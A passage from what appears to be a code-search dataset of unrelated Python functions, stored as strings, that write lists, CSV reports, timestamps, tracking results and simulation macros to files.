print 'list_file', list_file\n # print clip_list_arr\n\n return list_file", "def write(cls, vas):\n with open(Y, 'w') as f_i:\n for items in vas:\n f_i.write('%s ' % items)\n print(\"File written successfully. Check out \\\"output.txt\\\" file\")\n f_i.close()", "def write_to_file(self):\n name = datetime.today().date()\n with open(f'{name}.csv', 'w', newline='') as file_create:\n fieldnames = ['date', 'value_in_pln']\n writer = csv.DictWriter(file_create, fieldnames=fieldnames)\n writer.writeheader()\n while datetime.today() < self.track_to:\n value_of_currency = PriceTracker.track_price()\n with open(f'{file_create.name}', 'a', newline='') as file_append:\n fieldnames = ['date', 'value_in_pln']\n writer = csv.DictWriter(file_append, fieldnames=fieldnames)\n writer.writerow({'date': datetime.today().strftime(\"%H:%M:%S\"), 'value_in_pln': value_of_currency})\n\n self.check_min_value(tracked_price=value_of_currency)\n sleep(1)\n\n return self.generate_report(file_create.name)", "def write_list_to_file(ls, save_path):\n # Open in appendation mode given that this function may be called multiple\n # times on the same file (positive and negative sentiment are in separate\n # directories).\n out_file = open(save_path, \"w+\")\n for example in ls:\n out_file.write(example)\n out_file.write('\\n')", "def _save_tracker_output(seq: Sequence, tracker: Tracker, output: dict):\n\n if not os.path.exists(tracker.results_dir):\n print(\"create tracking result dir:\", tracker.results_dir)\n os.makedirs(tracker.results_dir)\n if seq.dataset in ['trackingnet', 'got10k']:\n if not os.path.exists(os.path.join(tracker.results_dir, seq.dataset)):\n os.makedirs(os.path.join(tracker.results_dir, seq.dataset))\n '''2021.1.5 create new folder for these two datasets'''\n if seq.dataset in ['trackingnet', 'got10k']:\n base_results_path = os.path.join(tracker.results_dir, seq.dataset, seq.name)\n else:\n base_results_path = os.path.join(tracker.results_dir, seq.name)\n\n def save_bb(file, data):\n tracked_bb = np.array(data).astype(int)\n np.savetxt(file, tracked_bb, delimiter='\\t', fmt='%d')\n\n def save_time(file, data):\n exec_times = np.array(data).astype(float)\n np.savetxt(file, exec_times, delimiter='\\t', fmt='%f')\n\n def save_score(file, data):\n scores = np.array(data).astype(float)\n np.savetxt(file, scores, delimiter='\\t', fmt='%.2f')\n\n def _convert_dict(input_dict):\n data_dict = {}\n for elem in input_dict:\n for k, v in elem.items():\n if k in data_dict.keys():\n data_dict[k].append(v)\n else:\n data_dict[k] = [v, ]\n return data_dict\n\n for key, data in output.items():\n # If data is empty\n if not data:\n continue\n\n if key == 'target_bbox':\n if isinstance(data[0], (dict, OrderedDict)):\n data_dict = _convert_dict(data)\n\n for obj_id, d in data_dict.items():\n bbox_file = '{}_{}.txt'.format(base_results_path, obj_id)\n save_bb(bbox_file, d)\n else:\n # Single-object mode\n bbox_file = '{}.txt'.format(base_results_path)\n save_bb(bbox_file, data)\n\n if key == 'all_boxes':\n if isinstance(data[0], (dict, OrderedDict)):\n data_dict = _convert_dict(data)\n\n for obj_id, d in data_dict.items():\n bbox_file = '{}_{}_all_boxes.txt'.format(base_results_path, obj_id)\n save_bb(bbox_file, d)\n else:\n # Single-object mode\n bbox_file = '{}_all_boxes.txt'.format(base_results_path)\n save_bb(bbox_file, data)\n\n if key == 'all_scores':\n if isinstance(data[0], (dict, OrderedDict)):\n data_dict = _convert_dict(data)\n\n for obj_id, d in data_dict.items():\n bbox_file = '{}_{}_all_scores.txt'.format(base_results_path, obj_id)\n save_score(bbox_file, d)\n else:\n # Single-object mode\n print(\"saving scores...\")\n bbox_file = '{}_all_scores.txt'.format(base_results_path)\n save_score(bbox_file, data)\n\n elif key == 'time':\n if isinstance(data[0], dict):\n data_dict = _convert_dict(data)\n\n for obj_id, d in data_dict.items():\n timings_file = '{}_{}_time.txt'.format(base_results_path, obj_id)\n save_time(timings_file, d)\n else:\n timings_file = '{}_time.txt'.format(base_results_path)\n save_time(timings_file, data)", "def save_list(todo_list, save_location):\r\n data_file_w = open(save_location,\r\n \"w\") # open the save file and clear the data from it\r\n data_file_w.write(\"Warning: The Todo-List Program will not be able to \"\r\n \"load this save file if it is incorrectly modified. \"\r\n \"Modify at your own risk. The structure is Entry \"\r\n \"Text, Entry Priority as a number, Entry Group as a \"\r\n \"number (Not Yet Utilized, but necessary), and Entry \"\r\n \"Visibility as a boolean, each on a separate line, a \"\r\n \"single line gap in between, and the \"\r\n \"very first line is skipped\\n\")\r\n for item in todo_list:\r\n data_file_w.write(\"{0}\\n{1}\\n{2}\\n{3}\\n\\n\".format(item.text,\r\n str(item.priority),\r\n str(item.group),\r\n str(item.visible)))\r\n data_file_w.close()\r\n return", "def save_time_spent(self):\n\n ratings_dir = Path(self.out_dir).resolve() / cfg.suffix_ratings_dir\n if not ratings_dir.exists():\n makedirs(ratings_dir, exist_ok=True)\n\n timer_file = ratings_dir / '{}_{}_{}'.format(\n self.vis_type, self.suffix, cfg.file_name_timer)\n\n lines = '\\n'.join(['{},{}'.format(sid, elapsed_time)\n for sid, elapsed_time in self.timer.items()])\n\n # saving to disk\n try:\n with open(timer_file, 'w') as tf:\n tf.write(lines)\n except:\n print('Unable to save timer info to disk -- printing them to log:')\n print(lines)\n raise IOError('Error in saving timer info to file!')\n\n # printing summary\n times = np.array(list(self.timer.values()))\n if len(times) < 10:\n print('\\n\\ntimes spent per subject in seconds:\\n{}'.format(lines))\n\n print('\\nMedian time per subject : {} seconds'.format(np.median(times)))\n print('\\t5th and 95th percentile of distribution of times spent '\n ': {} seconds'.format(np.nanpercentile(times, [5, 95])))", "def writeRawFCD():\n global vehId, vehIdDict\n vehIdDict = {}\n vehId = 0\n day = 0\n\n def getVehId(orgId):\n \"\"\"creates new vehicle id's which consists only numerics\"\"\"\n global vehId, vehIdDict\n value = vehIdDict.get(orgId, vehId)\n if value is vehId:\n vehIdDict[orgId] = vehId\n vehId = (vehId + 1) % 65500\n return value\n\n outputFile = open(path.FQrawFCD, 'w')\n\n for period, quota, vtypeDictR, taxiSum in generatePeriodQuotaSets():\n day += 86400\n # reset dict so that every taxi (even if the vehicle is chosen several\n # times) gets its own id\n vehIdDict = {}\n # dataset=0\n sortedKeys = vtypeDictR.keys()\n sortedKeys.sort()\n for timestep in sortedKeys:\n taxiList = vtypeDictR[timestep]\n for tup in taxiList: # all elements in this timestep\n # calc timestep ->for every period /quota set a new day\n time = timestep + day\n time = calcTime.getDateFromDepart(time)\n # dataset+=1\n # print ouptut\n # veh_id date (time to simDate+time) x (remove and\n # set comma new)\n outputFile.write(str(getVehId(tup[0])) + '\\t' + time + '\\t' + tup[3][0:2] + '.' + tup[3][2:7] + tup[3][8:] +\n # y (remove and set comma new)\n # status speed form m/s in km/h\n '\\t' + tup[4][0:2] + '.' + tup[4][2:7] + tup[4][8:] + '\\t' + \"90\" + '\\t' + str(int(round(tup[2] * 3.6))) + '\\n')\n # print dataset, time\n print(vehId)\n outputFile.close()", "def create_checkfile(artist_list):\n with open(\"checkfile4.txt\", 'w') as checkfile: # we are creating new file named checkfile, hence method r for write\n for new_artist in artist_list:\n for new_album in new_artist.albums:\n for new_song in new_album.tracks: # NOTE: we change below from 2.name back to 2.title\n print(\"{0.name}\\t{1.name}\\t{1.year}\\t{2.title}\".format(new_artist, new_album, new_song),\n file=checkfile)\n\n # NOTE: python 2 does not allow print above where you have {0.name} etc\n # To run this pring format in python 2, you need to import print_function at the top of code using:\n # from __future__ import print_function", "def dump_to_file(final_results):\n\t#Add prefix result\n\tif final_results[\"Results\"][\"Test passed\"] == True:\n\t\ttime_now = time.time()\n\t\touput_filepath = checklists_filepath.replace(\".json\", \"\", 1) + \"_\" + datetime.datetime.fromtimestamp(time_now).strftime('%Y-%m-%d_%Hh%Mm%Ss') + \"_PASSED.json\"\n\telse:\n\t\ttime_now = time.time()\n\t\touput_filepath = checklists_filepath.replace(\".json\", \"\", 1) + \"_\" + datetime.datetime.fromtimestamp(time_now).strftime('%Y-%m-%d_%Hh%Mm%Ss') + \"_FAILED.json\"\n\twith open(ouput_filepath, 'w') as fp:\n\t\tjson.dump(final_results, fp)\n\treturn ouput_filepath", "def outw():\n # make the record string\n # ok, pack em up...\n outstr = \"\".join(outlist)\n print(outstr)\n print(len(outstr))\n # of = open(\"workfile\", \"w\")\n of = open(\"workfile\", \"a\")\n # of.write(\\n)\n of.write(outstr)\n of.close()", "def save_list_to_file(the_list, filepath):\n with open(filepath, 'w') as file_handler:\n for item in the_list:\n file_handler.write(\"{}\\n\".format(item))", "def write_vote_ids():\r\n\r\n open_file = open(os.path.join('data', 'vote_ids.txt'), 'w')\r\n open_file.write(\"\\n\".join(vote_set))", "def save(self, filename, format = \"text\"):\n #\n for time in self.mdvtc.keys():\n if format == \"csv\":\n save_filename = filename + str(int(time)) + \".csv\"\n elif format == \"text\":\n save_filename = filename + str(int(time)) + \".txt\"\n else:\n save_filename = filename + str(int(time)) + \".txt\"\n self.mdvtc[time].save(save_filename, format)", "def save_current_run_time():\n # path = \"/Users/szou/Downloads/bu/happydogs/analytics_happydogs/last_time_run\" # hard coding this due to CRON, but will remove later\n output_file = open(\"last_time_run\", \"w\")\n current_time_string = datetime.datetime.strftime(\n datetime.datetime.now(), \"%Y-%m-%d %H:%M:%S\"\n )\n output_file.write(current_time_string)\n print(current_time_string)\n output_file.close()", "def writeout(self):\n out_file = ''.join(['theta_w_t', str(self.t), '.dat'])\n data_list = [] \n\n for i in xrange(self.n_params): \n data_list.append( self.theta_t[i,:] ) \n\n data_list.append(self.w_t)\n\n np.savetxt(\n out_file, \n (np.vstack(np.array(data_list))).T, \n delimiter='\\t'\n )\n\n return None", "def write_the_contents_to_the_same_file(self):\n if not len(self.student_list):\n print('There is no contents to write')\n return\n\n if self._filename is None:\n self._filename = self.input_filename()\n\n with open(self._filename, 'w') as OUT:\n OUT.write(self.student_list.to_csv(date_format='%Y-%m-%d',\n sep='\\t', header=False, columns=self.columns_to_save))\n print(f'Data are saved into {self._filename!r}')", "def save_to_csv(list_return, name, fieldnames):\n os.makedirs(os.path.dirname(name + '.csv'), exist_ok=True)\n with open(name + '.csv', 'w') as csvfile:\n csvfile.write(','.join(map(str, field_names)))\n csvfile.write('\\n')\n write = csv.writer(csvfile, delimiter=',')\n for x in range(0, len(list_return)):\n write.writerow(list_return[x])", "def main():\n parser = argparse.ArgumentParser(description='Saves MtGox trades for a time period')\n parser.add_argument('-s','--start', help='The start date in ' + input_dateformat + 'format', required=True)\n parser.add_argument('-e','--end', help='The end date'+ input_dateformat + 'format', required=True)\n args = vars(parser.parse_args())\n start=get_unixtime(args['start'], input_dateformat)\n end=get_unixtime(args['end'], input_dateformat)\n if end < start:\n print \"End timestamp must be later than start timestamp. Exiting\"\n sys.exit()\n print \"Will get trades from \", start, \"to\", end\n\n \"\"\" read the output file and adjust the start date, if it exists\n \"\"\"\n try:\n with open(outfile_name, \"r\") as in_file:\n goxdata = in_file.readlines() \n saved_start=get_unixtime(goxdata[0].split(\",\")[0], input_dateformat)\n saved_end=get_unixtime(goxdata[len(goxdata)-1].split(\",\")[0], input_dateformat)\n\n print \"File found, with start date:\", saved_start, \"and end date\", saved_end\n if start < saved_end:\n print \"Adjusted start time from \", start, \"to \", saved_end\n start = saved_end\n except IOError:\n print \"Output file not found. Will create a new one.\"\n\n \"\"\" get data from MtGox in chunks\n \"\"\"\n try:\n currstart = start\n endreached = False\n while endreached == False:\n # populate the trades dictionary with the next batch of data\n data = fetch_data(currstart)\n print \"Fetching data\", currstart\n if (data == '[]'):\n break \n trades = [mtgox_trade(a) for a in json.loads(data)]\n currstart = trades[-1].timestamp\n\n if trades[-1].timestamp > end:\n endreached = True\n\n # place trades into the out_file before getting the next batch from MtGox \n # so that if the program gets interrupt you have saved the trades obtained so far\n with open(outfile_name, \"a\") as out_file:\n for item in trades:\n # when you request data from a timestamp gox truncates your start time to seconds and then\n # send you everything including the initial second. So you must filter here trades\n # of the start_time second that are already in the database.\n if item.timestamp > start and item.timestamp < end:\n out_file.write(item.trade_to_string()+\"\\n\")\n\n except urllib2.HTTPError, e:\n print \"Error:\", str(e.code), str(e.reason)\n return\n except urllib2.URLError, e:\n print \"Error:\", e\n return", "def make_time_stamp_file():\n with open(TIME_STAMP_FILE_NAME, 'w') as f:\n f.write(datetime.datetime.now().strftime('%m/%d/%Y %I:%M%p'))", "def create_checkfile(artist_list):\n\n print(\"Creating checkfile...\")\n\n with open(\"checkfile.txt\", \"w\") as checkfile:\n\n for artist in artist_list:\n print(artist.name)\n for album in artist.albums:\n print(\"\\t\", album.name, album.year)\n for song in album.tracks:\n print(\"\\t\\t\", song.title)\n print(f\"{artist.name}\\t{album.name}\\t{album.year}\\t{song.title}\", file=checkfile)\n\n print(\"Checkfile created.\")\n print()\n print(\"=\" * 40)\n print()", "def save_output(output_list):\n wb = Workbook()\n ws1 = wb.active\n ws1.title = 'Sheet1'\n # Create title for columns\n columns_titles = ['Name', 'Condition description', 'birad[0]','birad[1]','birad[2]','birad[3]','birad[4]','birad[5]','birad[6]','Relevant modalities',\n 'Relevant findings', 'Unique findings','Additional info',\n 'Parameters', 50, 30, 10, 5, 1,'Pathogenomonic', 'Negative',\n 'Ignore', 'Associated conditions', 'Differential diagnosis', 'Notes']\n ws1.append(columns_titles)\n # Create list for output file\n for ol in output_list:\n for o in ol:\n cr_list = create_list(o)\n ws1.append(cr_list)\n wb.save(filename=OUTPUT_FILE)", "def write_results_dat(self, output_path):\n\n def fstr(nb):\n data = '%E' % nb\n if data == 'NAN':\n nb, power = 0,0\n else:\n nb, power = data.split('E')\n nb = float(nb) /10\n power = int(power) + 1\n return '%.5fE%+03i' %(nb,power)\n\n line = '%s %s %s %i %i %i %i %s %s %s %s %s %i\\n' % (fstr(self.axsec), fstr(self.xerru), \n fstr(self.xerrc), self.nevents, self.nw, self.maxit, self.nunwgt,\n fstr(self.luminosity), fstr(self.wgt), fstr(self.xsec), fstr(self.maxwgt),\n fstr(self.th_maxwgt), self.th_nunwgt) \n fsock = open(output_path,'w') \n fsock.writelines(line)\n for i in range(len(self.ysec_iter)):\n line = '%s %s %s %s %s %s\\n' % (i+1, self.ysec_iter[i], self.yerr_iter[i], \n self.eff_iter[i], self.maxwgt_iter[i], self.yasec_iter[i]) \n fsock.writelines(line)", "def write_to_file_y(path):\n path1 = path + \"/y_Macros\"\n if not os.path.exists(path1):\n os.mkdir(path1)\n for e in range(int(e_steps)+1):\n filename = \"x0y%sz0ke%s.mac\" %(dy*y + y_min, e*de + e_min)\n path = path1\n fullpath = os.path.join(path, filename)\n f = open(fullpath, \"w\")\n f.write('/rat/physics_list/OmitMuonicProcesses true\\n')\n f.write(\"/rat/physics_list/OmitHadronicProcesses true \\n\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write('/rat/db/set DETECTOR geo_file \"geo/snoplus.geo\"\\n')\n f.write('/rat/db/set GEO[scint] material \"labppo_scintillator\"\\n')\n f.write('/rat/db/set DAQ dqxx_info 0 \\n')\n f.write(\"/run/initialize \\n\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"/rat/proc frontend\\n\")\n f.write(\"/rat/proc trigger\\n\")\n f.write(\"/rat/proc eventbuilder\\n\")\n f.write(\"/rat/proc count\\n\")\n f.write(\"/rat/procset update 100\\n\")\n f.write(\"/rat/proc calibratePMT\\n\")\n f.write(\"/rat/proc scintFitter\\n\")\n f.write(\"/rat/proclast outroot\\n\")\n f.write('/rat/procset file \"x0y%sz0ke%s.root\"\\n' %(dy*y + y_min, e*de + e_min))\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"/generator/add combo gun:point:poisson\\n\")\n f.write(\"# want random, isotropic momentum distribution; energy given in MeV\\n\")\n f.write(\"/generator/vtx/set e- 0 0 0 %s\\n\" %(e*de + e_min))\n f.write(\"# position given in Cartesians, relative to detector center, in mm\\n\")\n f.write(\"/generator/pos/set 0 %s 0\\n\" % (dy*y + y_min))\n f.write(\"/generator/rate/set 1\\n\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"/rat/run/start %s\\n\" %(n))\n f.write(\"exit\")", "def result_file(accession_list):\n with open(\"../accessions_list.txt\", 'w') as file:\n file.write(accession_list)", "def list_to_ccd(weather_list: list, parameter_info: dict, file_path: str) -> bool:\n\n # Write meta data\n file_obj = open(file_path, 'w')\n file_obj.write(f\"# {parameter_info['location_name']}\\n\")\n file_obj.write(f\"# Year {parameter_info['year']}\\n\")\n file_obj.write(f\"# RIBuild - Hourly values, {parameter_info['description']} \\n\\n\")\n file_obj.write(parameter_info[\"intro\"] + \"\\n\\n\")\n\n # Write data\n day = 0\n hour = 0\n for i in range(len(weather_list)):\n\n # leap year 29th febuary removal\n\n if i % 24 == 0 and i != 0:\n hour = 0\n day += 1\n\n hour_str = str(hour) + \":00:00\"\n data = weather_list[i]\n file_obj.write(f'{day:>{6}}{hour_str:>{9}} {data:.2f}\\n')\n\n hour += 1\n\n file_obj.close()\n\n return True", "def write_to_csv(self):\n\n dump_list = []\n\n # add rows one by one, each as a list, even if only 1 element\n\n dump_list.append([\"test execution ID\",self.ID])\n dump_list.append([\"test execution name\",self.name])\n\n dump_list.append([\"test definition ID\",self.test_def_ID])\n test_def_name = get_indexed_item_from_file(self.test_def_ID, FILE_TEST_DEFINITIONS)\n dump_list.append([\"test definition name\",test_def_name])\n\n dump_list.append([\"associated challenge execution ID\",self.challenge_exec_ID])\n dump_list.append([\"user ID\",self.user_ID])\n\n if self.start_time != None:\n dump_list.append([\"test start time\",self.start_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n\n if self.finish_time != None:\n dump_list.append([\"test finish time\",self.finish_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n\n if self.challenge_start_time != None:\n dump_list.append([\"challenge stop time\",self.challenge_start_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n if self.restoration_detection_time != None:\n dump_list.append([\"restoration detection time\",self.restoration_detection_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n if self.recovery_time != None:\n if self.recovery_time.value != None:\n if type(self.recovery_time.value)==timedelta:\n # timedelta: days and seconds are attributes, total_seconds() is a method\n dump_list.append([\"MEASURED RECOVERY TIME (s)\",self.recovery_time.value.total_seconds()])\n rtday = self.recovery_time.value.days\n rthrs = self.recovery_time.value.seconds // 3600\n rtmin = (self.recovery_time.value.seconds % 3600) // 60\n rtsec = self.recovery_time.value.seconds % 60\n rtmil = self.recovery_time.value.microseconds\n dump_list.append([\"MEASURED RECOVERY TIME (days, hours, mins, seconds, microseconds)\",\n rtday, rthrs, rtmin, rtsec, rtmil])\n\n if self.associated_metric_values.length() > 0 :\n dump_list.append([\"Metric Values:\"])\n for item in self.associated_metric_values.get_timestamped_metric_values_as_strings():\n dump_list.append([item])\n\n if self.log.length() > 0 :\n dump_list.append([\"Log:\"])\n for item in self.log.get_timestamped_strings():\n dump_list.append([item])\n\n if self.CLI_responses.length() > 0 :\n dump_list.append([\"CLI responses:\"])\n for item in self.CLI_responses.get_timestamped_strings():\n dump_list.append([item])\n\n if self.API_responses.length() > 0 :\n dump_list.append([\"API responses:\"])\n for item in self.API_responses.get_timestamped_strings():\n dump_list.append([item])\n\n try:\n # output CSV file name: testDefExec + ID + start time + .csv\n file_name = \"testDefExec\" + \"{0:0=3d}\".format(self.test_def_ID) + \"-\" + self.start_time.strftime(\"%Y-%m-%d-%H-%M-%S\") + \".csv\"\n with open(file_name, \"w\", newline=\"\") as file:\n csv_file_writer = csv.writer(file)\n csv_file_writer.writerows(dump_list)\n except Exception as e:\n print(type(e), e)\n sys.exit()", "def record_time(t):\n\n f = open('time.out', 'w')\n f.write(str(t))\n f.close()", "def outputFunc(filename, parks,roading,private):\n #assert len(parks) == 3\n \n f = open(filename, 'wt')\n \n try:\n writer = csv.writer(f)\n writer.writerow(days)\n writer.writerow(parks)\n writer.writerow(roading)\n writer.writerow(private)\n finally:\n f.close()", "def write_output(arr, filename):\n print('Started writing the output..')\n f = open(filename, 'w')\n for a in arr:\n f.write(str(a) + '\\n')\n f.close()\n print('Done!, Open the file to see the approved loans.')", "def makereport(reslist, file=sys.stdout, hasTOI=False, hasRuns=False):\n\n if not hasRuns: reslist=[reslist]\n \n for irun, resrun in enumerate(reslist):\n file.write(\"Run: %d\\n\" % irun)\n for det, res in resrun.items():\n file.write(\"%d\" % det)\n\n try:\n if not hasTOI: \n val = res[1][0]\n sig = res[1][1]\n else:\n val = res[-1][1][0]\n sig = res[-1][1][1]\n \n for (v, s) in zip(val, sig):\n file.write(\" %f +- %f\" % (v, s))\n except:\n print(\"\\n... when running \", irun, det, end=' ')\n print(\"Unexpected error:\", sys.exc_info()[0])\n \n file.write(\"\\n\")", "def write_output(output):\n with open(\"/Users/maxwell/Documents/workspace/CoronaScan/results.csv\", 'a') as f:\n writer = csv.writer(f)\n print(\"Now writing output to results.csv . . .\")\n values = list(output.values())\n values.insert(0, datetime.date.today())\n writer.writerow(values)\n print(\"Finished writing output!\")", "def dump_all_binaries_to_CSV():\n ## TODO\n timenow = datetime.now()", "def test_write_race_results_to_file():\n number = random.randint(1, 3)\n f1.write_race_results_to_file(number)\n with open(f\"results_for_race_{number}.txt\", encoding=\"utf-8\") as opened_file:\n list_of_lines = opened_file.readlines()\n assert len(list_of_lines) == 13", "def write_list_to_file(myList, filename):\r\n\r\n with open(filename, \"w\") as outfile:\r\n for entries in myList:\r\n outfile.write(entries)\r\n\t\t\t# add a return after each line\r\n outfile.write(\"\\n\")", "def SaveListFile(file,lst):\n\tlst = [str(i) +\"\\n\" for i in lst]\n\tif len(lst) == 0:\n\t\treturn\n\twith open(file,'w') as f:\n\t\tf.writelines(lst)\n\treturn lst", "def save(self, path):\n for tube in self.inactive_tube_list:\n with open(path + \"{}.tube\".format(tube.id) , 'w+') as f:\n #f.write(\"Tube:{},{}\\n\".format(tube.id, len(tube))) \n for det in tube.detection_list:\n f.write(\"{}, {}, {}, {}, {}, {}, {}\\n\".format(det.frame_number, det.label, det.x1, det.y1, det.x2, det.y2, det.interpolated))", "def _write_endcy():\n return []", "def _save_target_info(self):\n \n #make sure the file exists\n path = self.communicator.image_store.project_path + \\\n self.target_file_name\n fout = open(path, 'w')\n\n print str(1)\n print str(len(self.target_list)-1)\n for i in range(1, len(self.target_list)):\n fout.write(self.target_list[i].format_info())\n fout.write(\"\\n\\n\")\n fout.close()", "def write_to_txt(self):\r\n file = open(self.output_path, 'w')\r\n for question_id in self.question_ids:\r\n file.write(self.questions[question_id].question_string+str(self.questions[question_id].answer)+'\\n')\r\n file.close()", "def write_to_csv(self):\n\n dump_list = []\n\n # add rows one by one, each as a list, even if only 1 element\n\n dump_list.append([\"challenge execution ID\",self.ID])\n dump_list.append([\"challenge execution name\",self.name])\n\n dump_list.append([\"challenge definition ID\",self.challenge_def_ID])\n challenge_def_name = get_indexed_item_from_file(self.challenge_def_ID, FILE_CHALLENGE_DEFINITIONS)\n dump_list.append([\"challenge definition name\",challenge_def_name])\n\n if self.start_time != None:\n dump_list.append([\"challenge start time\",self.start_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n if self.stop_time != None:\n dump_list.append([\"challenge stop time\",self.stop_time.strftime(\"%Y-%m-%d %H:%M:%S\")])\n\n if self.log.length() > 0 :\n dump_list.append([\"Log:\"])\n for item in self.log.get_timestamped_strings():\n dump_list.append([item])\n\n if self.CLI_responses.length() > 0 :\n dump_list.append([\"CLI responses:\"])\n for item in self.CLI_responses.get_timestamped_strings():\n dump_list.append([item])\n\n if self.API_responses.length() > 0 :\n dump_list.append([\"API responses:\"])\n for item in self.API_responses.get_timestamped_strings():\n dump_list.append([item])\n\n try:\n # output CSV file name: challDefExec + ID + start time + .csv\n file_name = \"challDefExec\" + \"{0:0=3d}\".format(self.challenge_def_ID) + \"-\" + self.start_time.strftime(\"%Y-%m-%d-%H-%M-%S\") + \".csv\"\n with open(file_name, \"w\", newline=\"\") as file:\n csv_file_writer = csv.writer(file)\n csv_file_writer.writerows(dump_list)\n except Exception as e:\n print(type(e), e)\n sys.exit()", "def save_to_file(self, tojuliet):\n if self.lc.time[0] < 1e4:\n self.lc.time += 2457000\n ascii.write([self.lc.time, self.lc.flux, self.lc.flux_err], 'TIC%d.dat' % self.TIC,\n format='fixed_width_no_header', delimiter=' ', overwrite=True)\n if tojuliet:\n ascii.write([self.lc.time, self.lc.flux, self.lc.flux_err,\n ['TESS' for _ in self.lc.time]], 'TIC%d_juliet.dat' % self.TIC,\n format='fixed_width_no_header', delimiter=' ', overwrite=True)", "def save_state(self):\n\t\tf = open('output.csv', 'a')\n\t\tstate = ';'.join([str(datetime.now()), str(self.thin._actuation_value), str(self.thin.temperature), str(self.thin.presence), str(self.outside.temperature)])\n\t\tprint(state)\n\t\tf.write(state + '\\n')\n\t\tf.close()", "def write_to_file(self, results):\n with open(self.outputFilename, \"w\") as csvFile:\n csvWriter = csv.writer(csvFile, delimiter=',') \n title_row = ('asset_id', 'component_id', 'latitude', 'longitude', 'installation_date', 'commissioning_date', 'street_name', 'cabinet_id', 'nominal_wattage', 'current_time', 'current_LogValue', 'current_IsLogValueOff') \n csvWriter.writerow(title_row)\n for record in results:\n csvWriter.writerow(record)", "def save_to_file(filename, R_list):\n k = len(R_list)\n with open(filename+'_board', mode='w') as file:\n file.write('There are totally {} candidates\\n'.format(k))\n for i in range(k):\n file.write('# {}\\n'.format(i+1))\n file.write(str(get_board(R_list[i])) + '\\n')\n\n save_var(filename, R_list)", "def print_to_file(start, stop, time_worked, work_text, work_log):\n today = datetime.date.today()\n\n record = ' || %.2f || %.2f || %.4f hours || %s\\n' % (start, stop, time_worked/3600, work_text)\n\n #if it is a new file you have the option to set a start time for the project\n # and how many hours a week you want to work\n if not os.path.isfile(work_log):\n while True:\n option = raw_input('\\nThis is a new log, would you like to specify a start date and a hours per week goal for the project? (y/n): ').lower()\n if option == 'y':\n date = raw_input('\\nplease enter the start date of the project (dd-mm-yyyy): ')\n hours_per_week = raw_input('\\nplease enter the number of hours you intend to work on the project per week: ')\n try:\n datetime.datetime.strptime(date, '%d-%m-%Y')\n if hours_per_week.isdigit():\n f = open(work_log, 'a')\n f.write('#! || ' + date + ':' + hours_per_week + '\\n')\n f.close()\n break\n else:\n print \"\\nPlease enter a valid number for hours to work!\\n\"\n except ValueError:\n print \"\\nPlease enter a valid date!\\n\"\n\n else:\n break\n\n\n f = open(work_log, 'a')\n print '\\n\\n' + today.strftime('%b-%d-%Y') + record\n f.write(today.strftime('%b-%d-%Y') + record)\n f.close()", "def write_list_to_file(program, list_to_write):\n with open(program.split('.')[0] + \".output.json\", 'a+') as output_file:\n output_file.write(json.dumps(list_to_write, indent=3, sort_keys=False))", "def write_file(l_dta, outputfile):\n l_dta2 = []\n for row in l_dta:\n s = '\\t'.join(row)\n l_dta2.append(s)\n s_dta = \"\\r\\n\".join(l_dta2)\n try:\n with open(outputfile, 'w') as fd:\n fd.write(s_dta)\n except (IOError,) as e:\n tracker()\n return None", "def sed_write_prob_mat_list_to_submission_csv(na_list, prob_mat_list, lbs, \n thres_ary, step_sec, out_path):\n create_folder(os.path.dirname(out_path))\n f = open(out_path, 'w')\n cnt = 0\n for n in xrange(len(na_list)):\n na = na_list[n]\n prob_mat = prob_mat_list[n]\n flag = False\n for i2 in xrange(len(lbs)):\n event_list = vad.activity_detection(x=prob_mat[:, i2], \n thres=thres_ary[i2], \n n_smooth=10, \n n_salt=10)\n if len(event_list) != 0:\n flag = True\n for [bgn, fin] in event_list:\n bgn_sec = step_sec * bgn\n fin_sec = step_sec * fin\n f.write(na + \"\\t\" + str(bgn_sec) + \"\\t\" + \\\n str(fin_sec) + \"\\t\" + lbs[i2] + \"\\n\")\n if flag == False: \n f.write(na + \"\\n\")\n f.close()\n print \"Write\", out_path, \"successfully!\"", "def save_to(self, path, overwrite=False, for_stsp=False):\n dirname = self.name\n output_path = os.path.join(path, dirname)\n self.times = Time(self.times)\n\n if not for_stsp:\n if os.path.exists(output_path) and overwrite:\n shutil.rmtree(output_path)\n\n if not os.path.exists(output_path):\n os.mkdir(output_path)\n for attr in ['times_jd', 'fluxes', 'errors', 'quarters']:\n np.savetxt(os.path.join(path, dirname, '{0}.txt'.format(attr)),\n getattr(self, attr))\n\n else:\n if not os.path.exists(output_path) or overwrite:\n attrs = ['times_jd', 'fluxes', 'errors']\n output_array = np.zeros((len(self.fluxes), len(attrs)), dtype=float)\n for i, attr in enumerate(attrs):\n output_array[:, i] = getattr(self, attr)\n np.savetxt(os.path.join(path, dirname+'.txt'), output_array)", "def action_date_ret(self):\n for wh in self.browse():\n if not wh.date_ret:\n self.write([wh.id],\n {'date_ret': time.strftime('%Y-%m-%d')})\n return True", "def writeChronListToFile(self):\n ## write header\n for header_line in self.outData['header']:\n self.outFile.write(header_line + '\\n')\n ##loop through each msg list\n for msg_list in self.outData_temp:\n ## create line\n msg_line = reconstructLine(msg_list)\n ## write to file\n self.outFile.write(msg_line + '\\n')", "def saveUsage(self, filePath):\n message = time.strftime('%c') + ' : '\n for spot in self.getParkingSpots():\n message += str(spot.id) + ', ' + spot.status + '; '\n with open(filePath, 'a+') as outfile:\n outfile.write(message + '\\n')\n pass", "def save_to_MTFIT_style_file(MTs, MTp, nlloc_hyp_filename, inversion_type, outdir, MTp_absolute=[], shift_idxs=[]):\n # Get uid and stations data:\n uid, stations = get_event_uid_and_station_data_MTFIT_FORMAT_from_nonlinloc_hyp_file(nlloc_hyp_filename)\n # Write all data to output dict:\n out_dict = {}\n out_dict[\"MTs\"] = MTs\n out_dict[\"MTp\"] = MTp\n out_dict[\"uid\"] = uid\n out_dict[\"stations\"] = stations\n if len(MTp_absolute)>0:\n out_dict[\"MTp_absolute\"] = MTp_absolute\n if len(shift_idxs)>0:\n out_dict[\"shift_idxs\"] = shift_idxs\n # And save to file:\n out_fname = outdir+\"/\"+uid+\"_FW_\"+inversion_type+\".pkl\"\n print(\"Saving FW inversion 